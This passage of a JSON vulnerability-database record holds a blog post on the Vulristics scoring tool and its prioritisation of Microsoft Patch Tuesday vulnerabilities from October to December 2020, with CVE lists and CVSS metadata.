"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16918", "CVE-2020-16928", "CVE-2020-16929", "CVE-2020-16930", "CVE-2020-16931", "CVE-2020-16932", "CVE-2020-16933", "CVE-2020-16934", "CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16947", "CVE-2020-16948", "CVE-2020-16949", "CVE-2020-16950", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953", "CVE-2020-16954", "CVE-2020-16955", "CVE-2020-16957"], "modified": "2023-03-17T00:00:00", "id": "KLA11976", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11976/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-01-30T22:26:39", "description": "In this episode I would like to make a status update of my [Vulristics project](<https://github.com/leonov-av/vulristics>). For those who don't know, in this project I retrieve publicly available vulnerability data and analyze it to better understand the severity of these vulnerabilities and better prioritize them. Currently, it is mainly about Microsoft Patch Tuesday vulnerabilities, but I have plans to go further. Also in this episode I want to demonstrate the new Vulristics features on Microsoft Patch Tuesday reports for October, November and December 2020.\n\n\n\n## Patch Tuesdays Automated Data Collection\n\nFirst of all, I dealt with the annoying collecting of the data for Microsoft Patch Tuesdays reports. Previously it took pretty long time. I had to go to Microsoft website and [search for CVE IDs](<https://msrc.microsoft.com/update-guide/vulnerability>). After that, I had to get the comments from various Vulnerability Management vendors and researchers blogs (Tenable, Qualys, Rapid7, ZDI). I wanted this to be as much automated as possible. I have added some code to make CVE search requests on the Microsoft website for a date range (including the second Tuesday of the month). I also figured out how to make searches on the Vulnerability Management vendors blogs. So, now to get a Microsoft Patch Tuesday report it's only necessary to set the year and month. \n\nSimple like this:\n \n \n import functions_report_ms_patch_tuesday_\n \n _functions_report_ms_patch_tuesday.make_ms_patch_tuesday_report(year=**\"2020\"**, month=**\"December\"**, rewrite_flag=True)\n\n## Vulristics Vulnerability Scoring (VVS)\n\nI decided that CVSS is not suitable for evaluating, sorting and comparing vulnerabilities. I needed something to automatically process hundreds vulnerabilities every month and to highlight the most critical ones. Finally, I decided to make my own scoring - Vulristics Vulnerability Scoring (VVS). \n\nDo you know the perfect formula for counting vulnerability criticality? Well, I don't.  Any scoring that I can make will be subjective and will probably change over time. But at least I can make it transparent and easily changeable, so that everyone can make their own vulnerability scoring most appropriate for a particular organization.\n\nSuch scoring should consider \n\n * CVSS Base score \n * existence of the exploit\n * exploitability of the vulnerability in the wild\n * popularity of the vulnerable software \n * type of the vulnerability\n\nExamples: \n\n2\\.  **Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 1.0| 18| Exploitation in the wild is mentioned at Vulners ([AttackerKB](<https://vulners.com/attackerkb/AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6>) object), [AttackerKB](<https://attackerkb.com/topics/y8mmBHc710/cve-2020-17087-windows-kernel-local-privilege-escalation-0day>), [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17087>) \nPublic Exploit Exists| 0| 17| Public exploit is NOT found at Vulners website \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n3\\.  **Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 0| 18| Exploitation in the wild is NOT found at Vulners, Microsoft and AttackerKB websites \nPublic Exploit Exists| 1.0| 17| Public exploit is found at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/PACKETSTORM:160028>)) \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n \n### Exploitablity in The Wild and Vulners\n\nThe really interesting thing was to detect if the vulnerability is being exploited in real attacks. I made a post in my telegram channel asking for ideas. We can't use Microsoft data directly because they do not update it after the initial vulnerability release. Other good sources are [AttackerKB by Rapid7](<https://attackerkb.com/>) and [US-CERT Bulletins](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>). \n\nI asked my friends from the Vulners team to add this feature and now you can [search for CVEs exploited in the wild](<https://vulners.com/search?query=enchantments.exploitation.wildExploited:true>) based on data from AttackerKB and US-CERT. \n\n\n\nAnd also this data is available in JSON format for the vulnerability:\n \n \n ... \n \"exploitation\": {\n \"wildExploited\": true,\n \"wildExploitedSources\": [\n {\n \"type\": \"cisa\",\n \"idList\": [\n \"CISA:2B970469D89016F563E142BE209443D8\",\n \"CISA:61F2653EF56231DB3AEC3A9E938133FE\",\n \"CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB\"\n ]\n },\n {\n \"type\": \"attackerkb\",\n \"idList\": [\n \"AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB\"\n ]\n }\n ],\n \"modified\": \"2020-12-25T13:57:26\"\n },\n ... \n \n\nI also added direct AttackerKB processing to Vulristics and some code to filter out false positives in "Exploitablity in The Wild".\n\n### VM Vendor's Comments \n\nWhat about VM Vendor's Comments? Firstly I thought that the existence of the comment from the vendor should be taken into consideration when counting the vulnerability score. But then I decided that it's a bad practice because the vendors are not who makes the criticality but they help you to test your scoring.\n\nFor example, if your score shows that some vulnerability is critical and vulnerability management vendors don't mention it, this means that your scoring has some flaws or the experts of VM vendor don't understand something. \n\n## Microsoft Patch Tuesdays Q4 2020\n\nNow let's take a look on the Vulrisctics Microsoft Patch Tuesday reports for October, November and December 2020.\n\n### October 2020\n\n * All vulnerabilities: 87\n * Urgent: 0\n * Critical: 2\n * High: 20\n * Medium: 63\n * Low: 2\n\nIt has been an interesting month. \n\nMost of the VM vendors and researchers focused on "**Remote Code Execution** - Windows TCP/IP ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) - High [500]", dubbed "Bad Neighbor". It affects all supported versions of Windows OS, and maybe unsupported/earlier versions of Windows as well. Tenable wrote: "According to a blog post from McAfee, Microsoft Active Protections Program (MAPP) members were provided with a test script that successfully demonstrates exploitation of this vulnerability to cause a denial of service (DoS). While the test scenario does not provide the ability to pivot to RCE, an attacker could craft a wormable exploit to achieve RCE. While an additional bug would be required to craft an exploit, it is likely that we will see proof-of-concept (PoC) code released in the near future." However, there has been no news since October.\n\nBut there is a more critical vulnerability with a public exploit "**Remote Code Execution** - Microsoft SharePoint ([CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) - Critical [640]". It was mentioned by all vendors, but without much emphasis.\n\nAnd the second critical vulnerability is "**Elevation of Privilege** - Windows COM Server ([CVE-2020-16916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16916>)) - Critical [628]" for which there is a flag of exploitation in the wild in AttackerKB. How much can you believe it? Well AttackerKB is a crowdsourcing platform, so possibly it can be fake.\n\nFor many other vulnerabilities (including 19 RCEs), there are no exploits or signs of exploitation in the wild. Among them, much attention has been paid to RCE in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). A quote from Tenable: "Because Outlook\u2019s Preview Pane is affected by this flaw, a user does not have to open the message in order for the vulnerability to be exploited. As Outlook is widely used for enterprise email, we highly recommend prioritizing the patching of this CVE."\n\n### November 2020\n\n * All vulnerabilities: 112\n * Urgent: 0\n * Critical: 3\n * High: 17\n * Medium: 90\n * Low: 2\n\n2 vulnerabilities were critical because there is information about them that they are Exploited in the wild. \n\nAll VM vendors initially did not notice "**Security Feature Bypass** - Kerberos KDC ([CVE-2020-17049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17049>)) - Critical [709]", only ZDI wrote that they don't understand what it is: "What security feature in Kerberos is being bypassed? What is the likelihood?". But then a post appeared with a [detailed description of the exploitation](<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/>). \n\nThe second critical is "**Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628]". It was used to escape Google Chrome\u2019s sandbox in order to elevate privileges on the exploited system.\n\nThe third critical vulnerability "**Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614]" has a public exploit at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/160028>)) \n\nMost of the comments this month were about "**Remote Code Execution** - Windows Network File System ([CVE-2020-17051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17051>)) - High [513]". A quote from Tenable: "In a blog post by McAfee, there is speculation about combining **CVE-2020-17051** with CVE-2020-17056, a remote kernel data read vulnerability in NFS, in order to bypass address space layout randomization (ASLR), which could increase the probability of a remote exploit". But in fact, we did not see any attacks or exploits for this vulnerability.\n\nAlso worth mentioning RCEs in\n\n * Microsoft Exchange Server ([CVE-2020-17083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17083>), [CVE-2020-17084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17084>))\n * Windows Print Spooler ([CVE-2020-17042](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17042>))\n * Microsoft Excel ([CVE-2020-17019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17019>), [CVE-2020-17064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17064>), [CVE-2020-17065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17065>), [CVE-2020-17066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17066>))\n * Microsoft SharePoint ([CVE-2020-17061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17061>))\n * Microsoft Teams ([CVE-2020-17091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17091>))\n\nBut we did not see any attacks or exploits for them either.\n\n### December 2020\n\n * All vulnerabilities: 58\n * Urgent: 0\n * Critical: 1\n * High: 23\n * Medium: 30\n * Low: 4\n\nThere were no vulnerabilities with exploits. \n\nThe critical is only "**Remote Code Execution** - Microsoft Exchange ([CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>)) - Critical [705]", because of AttackerKB. How realistic is this? You know, crowdsourcing. Rapid7: **CVE-2020-17144** which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute". Besides this, there were many other Microsoft Exchange RCEs ([CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>), [CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>), [CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>), [CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>)).\n\nOther RCEs worth mentioning were in:\n\n * Windows NTFS ([CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>)). Tenable: "An RCE in Windows NT File System (NTFS), the file system used in Microsoft Windows and Microsoft Windows Server. No user interaction is required to exploit this vulnerability. Depending on the attacker\u2019s position, there are a few avenues for exploitation. For an attacker that has already established a local position on the vulnerable system, executing a malicious application that exploits the flaw would result in an elevation of privileges. Alternatively, a remote attacker could exploit the flaw by sending malicious requests to a vulnerable system, so long as they could access it over the Server Message Block version 2 protocol (SMBv2). Successful exploitation in this context would grant the attacker arbitrary code execution".\n * Hyper-V ([CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>))\n * Microsoft SharePoint ([CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>), [CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>))\n * Microsoft Excel ([CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>), [CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>), [CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>), [CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>), [CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>), [CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>))\n\nThank you, I will be glad to know your opinion about Vulristics and how it can be further improved. Write to <https://t.me/avleonovchat>.\n\nFull reports are available here:\n\n * [October 2020](<http://avleonov.com/vulristics_reports/october2020_report_avleonov_comments.html>)\n * [November 2020](<http://avleonov.com/vulristics_reports/november2020_report_avleonov_comments.html>)\n * [December 2020](<http://avleonov.com/vulristics_reports/december2020_report_avleonov_comments.html>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-11T01:50:44", "type": "avleonov", "title": "Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2020-16898", "CVE-2020-16916", "CVE-2020-16947", "CVE-2020-16952", "CVE-2020-17001", "CVE-2020-17019", "CVE-2020-17042", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17056", "CVE-2020-17061", "CVE-2020-17064", "CVE-2020-17065", "CVE-2020-17066", "CVE-2020-17083", "CVE-2020-17084", "CVE-2020-17087", "CVE-2020-17091", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17125", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2021-01-11T01:50:44", "id": "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "href": "http://feedproxy.google.com/~r/avleonov/~3/mC48TITxRfM/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}